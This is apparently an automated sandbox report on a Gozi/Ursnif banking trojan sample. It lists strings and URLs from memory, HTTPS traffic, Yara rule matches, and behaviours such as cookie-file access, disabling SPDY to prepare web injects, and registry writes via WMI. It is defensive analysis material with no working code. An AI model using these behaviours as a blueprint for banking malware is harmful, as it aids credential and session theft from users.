Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml6.3.dr	String found in binary or memory: http://www.wikipedia.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml7.3.dr	String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: auction[1].htm.4.dr	String found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&ap
Source: auction[1].htm.4.dr	String found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&es=CsazlL8GIS8QFhi.JFtKfvSnxN098GrD2jBXu1zw2NcDglWh
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: auction[1].htm.4.dr	String found in binary or memory: https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clk.tradedoubler.com/click?p=245744&a=3064090&g=21863656
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de
Source: {CFBA71BE-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: {CFBA71BE-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: {CFBA71BE-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://i.geistm.com/l/HFCH_DTS_LP?bcid=602422ab6ae9074ae28c1cce&bhid=5f624df5866933554eb1ec8a&a
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: auction[1].htm.4.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: auction[1].htm.4.dr	String found in binary or memory: https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&es=UHzNHjQGIS_k028a1FME3ymH.QadGXGsFEQiiUKzRah9
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1613090821&rver
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1613090821&rver=7.0.6730.0&am
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1613090822&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1613090821&rver=7.0.6730.0&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: auction[1].htm.4.dr	String found in binary or memory: https://policies.oath.com/us/en/oath/privacy/index.html
Source: {CFBA71BE-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&campid=533862
Source: auction[1].htm.4.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/9HSbPjW4ScoNdwpxuW7OtQ--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: auction[1].htm.4.dr	String found in binary or memory: https://srtb.msn.com:443/notify/viewedg?rid=9332ca5bbb784e66806f2afeb24098ad&r=infopane&i=2&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch"
Source: imagestore.dat.4.dr, imagestore.dat.3.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dAiTg.img?h=166&amp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dBIyj.img?h=333&amp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dBVXB.img?h=166&amp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: {CFBA71BE-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: explorer.exe, 00000017.00000000.860537146.000000000FCE0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpMSN
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/der-z%c3%bcrcher-stadtrat-andreas-hauri-stellt-sich-zur-wiederw
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/ein-neues-gutachten-bezeichnet-das-corona-grundeinkommen-f%c3%b
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/eis-und-schnee-f%c3%bchren-zu-stau-und-zugausf%c3%a4llen/ar-BB1
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/schauk%c3%a4sereien-in-die-innenstadt-so-k%c3%b6nnte-die-zukunf
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/screen-zeigt-porno-mitten-in-z%c3%bcrich-nicht-der-erste-vorfal
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/stadt-z%c3%bcrich-beteiligt-sich-an-hochwasserschutz-f%c3%bcrs-
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/wir-wissen-nicht-wann-die-n%c3%a4chsten-impfdosen-eintreffen-im
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/z%c3%bcrcher-gemeinderat-sagt-ja-zum-velotunnel/ar-BB1dARla?oci
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/z%c3%bcrich-kopiert-basel-und-hilft-firmen-bei-den-gesch%c3%a4f
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/zu-dr%c3%a4ngeln-bis-man-geimpft-wird-bringt-gar-nichts-der-inf
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.4.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
Source: iab2Data[1].json.4.dr	String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49734 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.778286799.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778174223.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778148472.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778122341.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778237278.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778275510.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.785789013.0000000004D6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778197663.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778255655.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5032, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3848, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5152, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2848, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	1_2_00B15ECA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	1_2_00B15ECA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	1_2_00B15ECA

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.778286799.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778174223.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778148472.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778122341.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778237278.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778275510.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.785789013.0000000004D6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778197663.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.778255655.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5032, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3848, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5152, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2848, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_001F6EF1 NtCreateSection,memset,	1_2_001F6EF1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_001F7925 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_001F7925
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_001F9DDB NtMapViewOfSection,	1_2_001F9DDB
